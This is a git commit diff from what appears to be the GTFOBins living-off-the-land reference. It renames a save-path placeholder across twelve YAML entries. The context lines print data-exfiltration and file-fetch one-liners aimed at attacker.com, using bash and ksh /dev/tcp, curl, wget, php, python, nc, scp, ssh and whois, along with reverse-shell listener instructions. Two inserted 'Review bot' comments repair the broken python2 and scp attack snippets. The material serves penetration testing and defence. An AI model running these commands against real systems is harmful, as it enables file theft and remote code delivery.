Replace where_to_save with file_to_save

Emilio Pinna 2018-06-04 18:53:35 +01:00
parent 6a747b0920
commit 7e5bcab249
12 changed files with 19 additions and 19 deletions


@ -13,7 +13,7 @@ functions:
export RPORT=12345 export RPORT=12345
export LFILE=file_to_send export LFILE=file_to_send
bash -c 'echo -e "POST / HTTP/0.9\n\n$(cat $LFILE)" > /dev/tcp/$RHOST/$RPORT' bash -c 'echo -e "POST / HTTP/0.9\n\n$(cat $LFILE)" > /dev/tcp/$RHOST/$RPORT'
- description: Send local file using a TCP connection. Run `nc -l -p 12345 > "where_to_save"` on the attacker box to collect the file. - description: Send local file using a TCP connection. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file.
code: | code: |
export RHOST=attacker.com export RHOST=attacker.com
export RPORT=12345 export RPORT=12345


@ -10,6 +10,6 @@ functions:
- description: Fetch a remote file via HTTP GET request. - description: Fetch a remote file via HTTP GET request.
code: | code: |
URL=http://attacker.com/file_to_get URL=http://attacker.com/file_to_get
LFILE=where_to_save LFILE=file_to_save
curl $URL -o $LFILE curl $URL -o $LFILE
--- ---


@ -13,7 +13,7 @@ functions:
export RPORT=12345 export RPORT=12345
export LFILE=file_to_send export LFILE=file_to_send
ksh -c 'echo -e "POST / HTTP/0.9\n\n$(cat $LFILE)" > /dev/tcp/$RHOST/$RPORT' ksh -c 'echo -e "POST / HTTP/0.9\n\n$(cat $LFILE)" > /dev/tcp/$RHOST/$RPORT'
- description: Send local file using a TCP connection. Run `nc -l -p 12345 > "where_to_save"` on the attacker box to collect the file. - description: Send local file using a TCP connection. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file.
code: | code: |
export RHOST=attacker.com export RHOST=attacker.com
export RPORT=12345 export RPORT=12345


@ -1,7 +1,7 @@
--- ---
functions: functions:
upload: upload:
- description: Send a file to a TCP port. Run `nc -l -p 12345 > "where_to_save"` on the attacker box to collect the file. - description: Send a file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file.
code: | code: |
RHOST=attacker.com RHOST=attacker.com
RPORT=12345 RPORT=12345
@ -11,7 +11,7 @@ functions:
- description: Fetch remote file from a remote TCP port. Run `nc target.com 12345 < "file_to_send"` on the attacker box to send the file. - description: Fetch remote file from a remote TCP port. Run `nc target.com 12345 < "file_to_send"` on the attacker box to send the file.
code: | code: |
LPORT=12345 LPORT=12345
LFILE=where_to_save LFILE=file_to_save
nc -l -p $LPORT > "$LFILE" nc -l -p $LPORT > "$LFILE"
reverse-shell-interactive: reverse-shell-interactive:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell. - description: Run `nc -l -p 12345` on the attacker box to receive the shell.


@ -38,7 +38,7 @@ functions:
- description: Fetch a remote file via HTTP GET request. - description: Fetch a remote file via HTTP GET request.
code: | code: |
export URL=http://attacker.com/file_to_get export URL=http://attacker.com/file_to_get
export LFILE=where_to_save export LFILE=file_to_save
php -r '$c=file_get_contents(getenv("URL"));file_put_contents(getenv("LFILE"), $c);' php -r '$c=file_get_contents(getenv("URL"));file_put_contents(getenv("LFILE"), $c);'
reverse-shell-interactive: reverse-shell-interactive:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell. - description: Run `nc -l -p 12345` on the attacker box to receive the shell.


@ -20,7 +20,7 @@ functions:
- description: Fetch a remote file via HTTP GET request. - description: Fetch a remote file via HTTP GET request.
code: | code: |
export URL=http://attacker.com/file_to_get export URL=http://attacker.com/file_to_get
export LFILE=where_to_save export LFILE=file_to_save
python2 -c 'import urllib as u,os.environ as e;u.urlretrieve(e["URL"], e["LFILE"])' python2 -c 'import urllib as u,os.environ as e;u.urlretrieve(e["URL"], e["LFILE"])'
reverse-shell-interactive: reverse-shell-interactive:
- description: Run <code>socat file:`tty`,raw,echo=0 tcp-listen:12345</code> on the attacker box to receive the shell. - description: Run <code>socat file:`tty`,raw,echo=0 tcp-listen:12345</code> on the attacker box to receive the shell.
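Review bot: The python2 one-liner in this section uses `import urllib as u,os.environ as e`, and `os.environ` is an attribute of the `os` module rather than a submodule, so the import raises ImportError before `urlretrieve` is reached. The python3 entry changed in this same commit uses `from os import environ as e`, and the same form works here: `import urllib as u;from os import environ as e;u.urlretrieve(e["URL"], e["LFILE"])`. The commit only renames the `LFILE` placeholder, so this predates it. The `functions:` mapping continues outside the hunk.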


@ -20,7 +20,7 @@ functions:
- description: Fetch a remote file via HTTP GET request. - description: Fetch a remote file via HTTP GET request.
code: | code: |
export URL=http://attacker.com/file_to_get export URL=http://attacker.com/file_to_get
export LFILE=where_to_save export LFILE=file_to_save
python3 -c 'import urllib.request as u;from os import environ as e; u.urlretrieve (e["URL"], e["LFILE"])' python3 -c 'import urllib.request as u;from os import environ as e; u.urlretrieve (e["URL"], e["LFILE"])'
reverse-shell-interactive: reverse-shell-interactive:
- description: Run <code>socat file:`tty`,raw,echo=0 tcp-listen:12345</code> on the attacker box to receive the shell. - description: Run <code>socat file:`tty`,raw,echo=0 tcp-listen:12345</code> on the attacker box to receive the shell.


@ -24,13 +24,13 @@ functions:
upload: upload:
- description: Send local file to a SSH server. - description: Send local file to a SSH server.
code: | code: |
RPATH=user@attacker.com:~/where_to_save RPATH=user@attacker.com:~/file_to_save
LPATH=file_to_send LPATH=file_to_send
scp $LFILE $RPATH scp $LFILE $RPATH
download: download:
- description: Fetch a remote file from a SSH server. - description: Fetch a remote file from a SSH server.
code: | code: |
RPATH=user@attacker.com:~/file_to_get RPATH=user@attacker.com:~/file_to_get
LFILE=where_to_save LFILE=file_to_save
scp $RPATH $LFILE scp $RPATH $LFILE
--- ---
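Review bot: The upload example in this section assigns `LPATH=file_to_send`, but the command on the next line is `scp $LFILE $RPATH`, so `LFILE` is never set and scp is called with a single argument. Rename the assignment to `LFILE=file_to_send`, which matches the download entry below it, or change the command to `scp $LPATH $RPATH`. Quoting the expansions, as in `scp "$LFILE" "$RPATH"`, would also keep paths containing spaces intact. The commit touches only the placeholder on the `RPATH` line, so the mismatch predates it.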


@ -15,11 +15,11 @@ functions:
code: | code: |
RHOST=user@attacker.com RHOST=user@attacker.com
sftp $RHOST sftp $RHOST
put file_to_send where_to_save put file_to_send file_to_save
download: download:
- description: Fetch a remote file from a SSH server. - description: Fetch a remote file from a SSH server.
code: | code: |
RHOST=user@attacker.com RHOST=user@attacker.com
sftp $RHOST sftp $RHOST
get file_to_get where_to_save get file_to_get file_to_save
--- ---


@ -13,13 +13,13 @@ functions:
code: | code: |
HOST=user@attacker.com HOST=user@attacker.com
RPATH=file_to_get RPATH=file_to_get
LPATH=where_to_save LPATH=file_to_save
ssh $HOST "cat $RPATH" > $LPATH ssh $HOST "cat $RPATH" > $LPATH
upload: upload:
- description: Send local file to a SSH server. - description: Send local file to a SSH server.
code: | code: |
HOST=user@attacker.com HOST=user@attacker.com
RPATH=where_to_save RPATH=file_to_save
LPATH=file_to_send LPATH=file_to_send
ssh $HOST "cat > $RPATH" < $LPATH ssh $HOST "cat > $RPATH" < $LPATH
file-read: file-read:


@ -10,6 +10,6 @@ functions:
- description: Fetch a remote file via HTTP GET request. - description: Fetch a remote file via HTTP GET request.
code: | code: |
export URL=http://attacker.com/file_to_get export URL=http://attacker.com/file_to_get
export LFILE=where_to_save export LFILE=file_to_save
wget $URL -O $LFILE wget $URL -O $LFILE
--- ---


@ -3,13 +3,13 @@ description: |
`whois` hangs waiting for the remote peer to close the socket. `whois` hangs waiting for the remote peer to close the socket.
functions: functions:
upload: upload:
- description: Send a text file to a TCP port. Run `nc -l -p 12345 > "where_to_save"` on the attacker box to collect the file. The file has a trailing `$'\x0d\x0a'` and its length is limited by the maximum size of arguments. - description: Send a text file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file. The file has a trailing `$'\x0d\x0a'` and its length is limited by the maximum size of arguments.
code: | code: |
RHOST=attacker.com RHOST=attacker.com
RPORT=12345 RPORT=12345
LFILE=file_to_send LFILE=file_to_send
whois -h $RHOST -p $RPORT "`cat $LFILE`" whois -h $RHOST -p $RPORT "`cat $LFILE`"
- description: Send a binary file to a TCP port. Run `nc -l -p 12345 | tr -d $'\x0d' | base64 -d > "where_to_save"` on the attacker box to collect the file. The file length is limited by the maximum size of arguments. - description: Send a binary file to a TCP port. Run `nc -l -p 12345 | tr -d $'\x0d' | base64 -d > "file_to_save"` on the attacker box to collect the file. The file length is limited by the maximum size of arguments.
code: | code: |
RHOST=attacker.com RHOST=attacker.com
RPORT=12345 RPORT=12345
@ -20,12 +20,12 @@ functions:
code: | code: |
RHOST=attacker.com RHOST=attacker.com
RPORT=12345 RPORT=12345
LFILE=where_to_save LFILE=file_to_save
whois -h $RHOST -p $RPORT > "$LFILE" whois -h $RHOST -p $RPORT > "$LFILE"
- description: Fetch remote binary file from a remote TCP port. Run `base64 "file_to_send" | nc -l -p 12345` on the attacker box to send the file. - description: Fetch remote binary file from a remote TCP port. Run `base64 "file_to_send" | nc -l -p 12345` on the attacker box to send the file.
code: | code: |
RHOST=attacker.com RHOST=attacker.com
RPORT=12345 RPORT=12345
LFILE=where_to_save LFILE=file_to_save
whois -h $RHOST -p $RPORT | base64 -d > "$LFILE" whois -h $RHOST -p $RPORT | base64 -d > "$LFILE"
--- ---